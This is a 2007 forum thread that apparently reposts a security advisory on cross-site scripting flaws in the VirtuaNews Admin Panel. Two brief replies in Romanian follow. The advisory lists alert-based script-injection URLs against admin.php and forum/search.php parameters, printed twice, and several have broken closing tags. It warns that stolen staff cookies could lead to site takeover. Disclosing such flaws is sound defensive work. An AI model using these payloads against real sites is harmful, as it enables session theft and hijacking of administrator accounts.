zbeng Posted March 11, 2007 Report Posted March 11, 2007 1) Introduction2) Bug3) The Code~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~===============1) Introduction===============VirtuaNews Admin Panel is a good administration software. Manyadministrators choose itto be their "safe door", therefore it should strong and safe. The main riskdescribes in thisadvisory is the harm that could be done to the administration staff. Whenthe vulnerabilitiesconcerns the staff it is more dangerous that harming users, because if astaff's member cookieis stolen, the attackers can take over the website.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~======2) Bug======The Vulnerabillity is Cross Site Scripting. If an attacker will request anyof the followingurls from the server:http://<host>/admin.php?"><script>alert('XSS')script>http://<host>/forum/search.php?do=process&showposts=0&query=<script>alert('XSS')script>http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')script>http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea>--><script>alert('XSS')script>http://<host>/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')script>http://<host>/admin.php?action=files&expand="><script>alert('XSS')script>http://<host>/admin.php?action=files_cat_delete&id="><script>alert('XSS')</script>http://<host>/admin.php?action=files_check&catid="><script>alert('XSS')</script>http://<host>/admin.php?action=newslogo_upload&"><script>alert('XSS')</script>XSS appears and the server allows an attacker to inject & execute scripts.In the words of securityfocus.com :~~~~~~~~~~~~~~~~~~~~~~~~~~If all of these circumstances are met, an attacker may be able to exploitthis issuevia a malicious link containing arbitrary HTML and script code as part ofthe hostname.When the malicious link is clicked by an unsuspecting user, theattacker-supplied HTMLand script code will be executed by their web client. This will occurbecause the serverwill echo back the malicious hostname supplied in the client's request,without sufficientlyescaping HTML and script code.Attacks of this nature may make it possible for attackers to manipulate webcontent or tosteal cookie-based authentication credentials. It may be possible to takearbitrary actions as the victim user.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~===========3) The Code===========http://<host>/admin.php?"><script>alert('XSS')script>http://<host>/forum/search.php?do=process&showposts=0&query=<script>alert('XSS')script>http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')script>http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea>--><script>alert('XSS')/script>http://<host>/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')script>http://<host>/admin.php?action=files&expand="><script>alert('XSS')script>http://<host>/admin.php?action=files_cat_delete&id="><script>alert('XSS')</script>http://<host>/admin.php?action=files_check&catid="><script>alert('XSS')</script>http://<host>/admin.php?action=newslogo_upload&"><script>alert('XSS')</script> Quote
Zeus Posted April 29, 2007 Report Posted April 29, 2007 ...nu ii asa palpitant sa citesti un post dupa nenumarate clickuri... Quote
virusz Posted April 30, 2007 Report Posted April 30, 2007 + parca erau 3 parti: 1) Introduction2) Bug3) The Code..sus is numa 2 din care doar una e cmpleta .... plz edit Quote